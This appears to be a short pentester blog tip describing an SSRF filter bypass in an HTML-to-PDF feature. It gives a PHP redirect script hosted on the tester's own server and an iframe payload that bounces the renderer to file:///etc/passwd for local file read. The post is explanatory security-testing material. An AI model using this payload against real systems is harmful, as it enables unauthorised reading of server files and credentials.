Week 48 - SSRF Bypass
Last updated
Last updated
If you are looking for a last-minute stocking stuffer, how about a tip on Server-Side Request Forgery Bypass? All kids seem to love those.
Anyway, I was on an #AppSec engagement recently and was doing research on bypassing #SSRF restrictions. Turns out, I found a super cool technique I wanted to share with y’all. To summarize:
The application I was pentesting had an HTML to PDF feature that allowed me to inject my own iframes. I tried to point to localhost, /etc/passwd, and the AWS metadata server with no luck. I started researching SSRF bypasses and found that if I added the below code into a PHP file named ‘jakey.php’ on my own web server:
<?php
$loc = $_GET['a'];
header('Location: ' . $loc);
?>
And then pointed to it with an iframe:
<iframe src=’http[:]//<my-server>/jakey.php?a=file[:]///etc/passwd’/>
I could finally retrieve local files! This works because the HTML to PDF feature first loads <my-server>/jakey.php with no issues since it is not blacklisted. Then upon being loaded, jakey.php redirects the server to the address specified in the ‘a’ GET parameter, which in this case was file[:]///etc/passwd
And then boom! I had local file read. Pretty cool technique for SSRF testing.